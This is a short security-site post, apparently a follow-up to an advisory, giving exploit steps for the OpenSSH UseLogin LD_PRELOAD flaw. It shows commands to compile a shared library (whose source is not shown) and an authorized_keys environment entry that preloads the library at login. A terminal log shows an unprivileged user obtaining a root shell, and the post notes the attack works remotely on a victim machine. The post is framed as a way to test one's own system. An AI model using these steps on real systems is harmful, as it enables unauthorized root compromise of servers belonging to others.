In our previous article: OpenSSH UseLogin Directive Vulnerability Leads to Remote Root Compromise, we discussed a security vulnerability in OpenSSH that would allow a local attacker to gain elevated privileges. The following is an exploit code that would allow you to test your system for the mentioned vulnerability.
Credit:
The information has been provided by [WaR].
Compile it into a library:
$ gcc -c -o lib.o lib.c
$ ld -shared -o libroot.so lib.o
$ chmod 755 ./libroot.so
Now, for the tricky part:
You must have an account on the machine, and create an entry on $HOME/.ssh/authorized_keys (or authorized_keys2) with:
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
When SSH receives your connection, it will export this variable into the environment before running login. Somewhere after this, it executes a setuid. When it does, it makes a seteuid(0).
$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)
This also works remotely. Anyway, you must have an account on the victim machine so you can setup the enviroment, and login. Obviously, it must have UseLogin enabled.
